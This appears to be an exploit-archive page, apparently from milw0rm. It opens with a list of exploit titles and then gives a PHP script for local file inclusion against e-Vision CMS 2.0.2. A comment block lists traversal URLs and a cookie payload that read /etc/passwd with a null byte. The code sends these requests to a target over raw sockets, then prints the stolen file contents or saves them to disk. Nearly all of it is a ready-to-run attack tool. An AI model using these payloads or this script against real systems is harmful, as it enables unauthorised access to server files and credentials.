
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
231 lines
6.9 KiB
PHP
Executable file
231 lines
6.9 KiB
PHP
Executable file
<?php
|
|
|
|
error_reporting(0);
|
|
ini_set("default_socket_timeout",5);
|
|
|
|
|
|
|
|
|
|
/*
|
|
e-Vision <= 2.0.2 Multiple Local File Inclusion Exploit
|
|
-------------------------------------------------------
|
|
by athos - download http://sourceforge.net
|
|
-------------------------------------------------------
|
|
Works with magic quotes gpc turned off
|
|
|
|
|
|
javascript: document.cookie="adminlang=../../../../etc/passwd";
|
|
modules/3rdparty/adminpart/add3rdparty.php?module=../../../../../../etc/passwd
|
|
modules/polling/adminpart/addpolling.php?module=../../../../../etc/passwd
|
|
modules/contact/adminpart/addcontact.php?module=../../../../etc/passwd
|
|
modules/brandnews/adminpart/addbrandnews.php?module=../../../etc/passwd
|
|
modules/newsletter/adminpart/addnewsletter.php?module=../../../../etc/passwd
|
|
modules/game/adminpart/addgame.php?module=../../../../etc/passwd
|
|
modules/tour/adminpart/addtour.php?module=../../../etc/passwd
|
|
modules/articles/adminpart/addarticles.php?module=../../../../etc/passwd
|
|
modules/product/adminpart/addproduct.php?module=../../../../etc/passwd
|
|
modules/plain/adminpart/addplain.php?module=../../../../../etc/passwd
|
|
|
|
../../etc/passwd and nullbyte
|
|
|
|
how to fix? addslashes($_GET['module']); so you remove the nullbyte...isn't a good fix
|
|
|
|
|
|
coded by me
|
|
|
|
|
|
*/
|
|
|
|
$exploit = new Exploit;
|
|
$domain = $argv[1];
|
|
$mymode = $argv[2];
|
|
|
|
$exploit->starting();
|
|
$exploit->is_vulnerable($domain);
|
|
$exploit->exploiting($domain,$mymode);
|
|
|
|
|
|
|
|
class Exploit
|
|
{
|
|
function http_request($host,$data)
|
|
{
|
|
|
|
if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP))
|
|
{
|
|
echo "socket_create() error!\r\n";
|
|
exit;
|
|
}
|
|
if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1))
|
|
{
|
|
echo "socket_set_option() error!\r\n";
|
|
exit;
|
|
}
|
|
|
|
if(!socket_connect($socket,$host,80))
|
|
{
|
|
echo "socket_connect() error!\r\n";
|
|
exit;
|
|
}
|
|
if(!socket_write($socket,$data,strlen($data)))
|
|
{
|
|
echo "socket_write() errror!\r\n";
|
|
exit;
|
|
}
|
|
|
|
while($get = socket_read($socket,1024,PHP_NORMAL_READ))
|
|
{
|
|
$content .= $get;
|
|
}
|
|
|
|
socket_close($socket);
|
|
|
|
$array = array(
|
|
'HTTP/1.1 404 Not Found',
|
|
'HTTP/1.1 300 Multiple Choices',
|
|
'HTTP/1.1 301 Moved Permanently',
|
|
'HTTP/1.1 302 Found',
|
|
'HTTP/1.1 304 Not Modified',
|
|
'HTTP/1.1 400 Bad Request',
|
|
'HTTP/1.1 401 Unauthorized',
|
|
'HTTP/1.1 402 Payment Required',
|
|
'HTTP/1.1 403 Forbidden',
|
|
'HTTP/1.1 405 Method Not Allowed',
|
|
'HTTP/1.1 406 Not Acceptable',
|
|
'HTTP/1.1 407 Proxy Authentication Required',
|
|
'HTTP/1.1 408 Request Timeout',
|
|
'HTTP/1.1 409 Conflict',
|
|
'HTTP/1.1 410 Gone',
|
|
'HTTP/1.1 411 Length Required',
|
|
'HTTP/1.1 412 Precondition Failed',
|
|
'HTTP/1.1 413 Request Entity Too Large',
|
|
'HTTP/1.1 414 Request-URI Too Long',
|
|
'HTTP/1.1 415 Unsupported Media Type',
|
|
'HTTP/1.1 416 Request Range Not Satisfiable',
|
|
'HTTP/1.1 417 Expectation Failed',
|
|
'HTTP/1.1 Retry With',
|
|
);
|
|
|
|
for($i=0;$i<=count($array);$i++)
|
|
|
|
if(eregi($array[$i],$content))
|
|
{
|
|
return ("$array[$i]\r\n");
|
|
break;
|
|
}
|
|
else
|
|
{
|
|
return ("$content\r\n");
|
|
break;
|
|
}
|
|
}
|
|
|
|
function is_vulnerable($host)
|
|
{
|
|
$host = explode('/',$host);
|
|
|
|
$header .= "GET /$host[1]/modules/3rdparty/adminpart/add3rdparty.php?module=%27 HTTP/1.1\r\n";
|
|
$header .= "Host: $host[0]\r\n";
|
|
$header .= "User-Agent: athos~doesntexist\r\n";
|
|
$header .= "Connection: close\r\n\r\n";
|
|
|
|
if(stristr($this->http_request($host[0],$header),"\\'"))
|
|
{
|
|
echo "[+] Magic Quotes GPC On!\n";
|
|
echo "[+] Exploit Failed!\n";
|
|
exit;
|
|
}
|
|
else
|
|
{
|
|
return false;
|
|
}
|
|
}
|
|
|
|
function starting()
|
|
{
|
|
global $argv;
|
|
|
|
if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1]))
|
|
{
|
|
echo "[+] e-Vision <= 2.0.2 Multiple Local File Inclusion Exploit\r\n";
|
|
echo "[+] by athos\r\n";
|
|
echo " -----------------------------------------------------------\r\n";
|
|
echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
|
|
echo "[+] Usage: php $argv[0] [host/path] [save]\r\n";
|
|
echo "[+] Usage: php $argv[0] [host/path] \r\n";
|
|
exit;
|
|
}
|
|
}
|
|
|
|
function exploiting($host,$mode)
|
|
{
|
|
$host = explode('/',$host);
|
|
$i = 0;
|
|
|
|
|
|
echo "[+] Local File (ex: ../../etc/passwd%00)\r\n";
|
|
echo "[+] Local File: ";
|
|
$file = stripslashes(trim(fgets(STDIN)));
|
|
|
|
if(empty($file)) die("you fail");
|
|
|
|
$array = array (
|
|
"3rdparty/adminpart/add3rdparty.php?module=$file",
|
|
"polling/adminpart/addpolling.php?module=$file",
|
|
"contact/adminpart/addcontact.php?module=$file",
|
|
"brandnews/adminpart/addbrandnews.php?module=$file",
|
|
"newsletter/adminpart/addnewsletter.php?module=$file",
|
|
"game/adminpart/addgame.php?module=$file",
|
|
"tour/adminpart/addtour.php?module=$file",
|
|
"articles/adminpart/addarticles.php?module=$file",
|
|
"product/adminpart/addproduct.php?module=$file",
|
|
"plain/adminpart/addplain.php?module=$file",
|
|
);
|
|
|
|
if($i > 9)
|
|
{
|
|
$write .= "GET /$host[1]/admin/ind_ex.php HTTP/1.1\r\n";
|
|
$write .= "Host: $host[0]\r\n";
|
|
$write .= "User-Agent: doesntexist\r\n";
|
|
$write .= "Cookie: adminlang=$file; path=/admin\r\n";
|
|
$write .= "Connection: close\r\n\r\n";
|
|
}
|
|
else
|
|
{
|
|
|
|
$write .= "GET /$host[1]/modules/$array[$i] HTTP/1.1\r\n";
|
|
$write .= "Host: $host[0]\r\n";
|
|
$write .= "User-Agent: you are lost\r\n";
|
|
$write .= "Connection: close\r\n\r\n";
|
|
}
|
|
|
|
if(stristr($this->http_request($host[0],$write),'No such file or directory in'))
|
|
{
|
|
$i++;
|
|
}
|
|
else
|
|
{
|
|
if($mode == "save")
|
|
{
|
|
$rand = rand(0,99999);
|
|
fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write)));
|
|
|
|
echo "[+] File $rand Saved Successfully!\r\n";
|
|
echo "[+] Exploit Terminated!\r\n";
|
|
exit;
|
|
}
|
|
else
|
|
{
|
|
echo $this->http_request($host[0],$write);
|
|
exit;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
// StAkeR - StAkeR[at]hotmail[dot]it
|
|
// Note: if you add on msn i don't accept!
|
|
// Greetz "er biondo"
|
|
|
|
# milw0rm.com [2008-11-07]
|